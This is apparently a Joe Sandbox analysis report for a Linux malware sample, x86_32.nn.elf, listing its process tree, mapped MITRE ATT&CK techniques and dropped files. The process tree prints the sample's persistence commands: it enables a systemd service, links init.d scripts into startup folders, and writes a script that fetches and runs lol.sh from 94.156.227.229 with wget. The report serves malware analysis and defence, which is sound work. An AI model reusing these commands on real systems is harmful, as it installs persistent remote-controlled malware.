Analysis Process: x86_32.nn.elf PID: 5515, Parent PID: 5434

General

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	/tmp/x86_32.nn.elf
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/sh
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/sh /etc/rc.d/S99sh
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/tmp/x86_32.nn.elf
Arguments:	-
File size:	79312 bytes
MD5 hash:	21dd74becf40d7fa78e56c5c0c66ff40

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:14:50
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:14:51
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:14:51
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:14:51
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:14:51
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report x86_32.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/sh

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: x86_32.nn.elf PID: 5515, Parent PID: 5434

General

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 5526, Parent PID: 5515

General

Chronological Activities

Analysis Process: sh PID: 5526, Parent PID: 5515

General

Linux Analysis Report
x86_32.nn.elf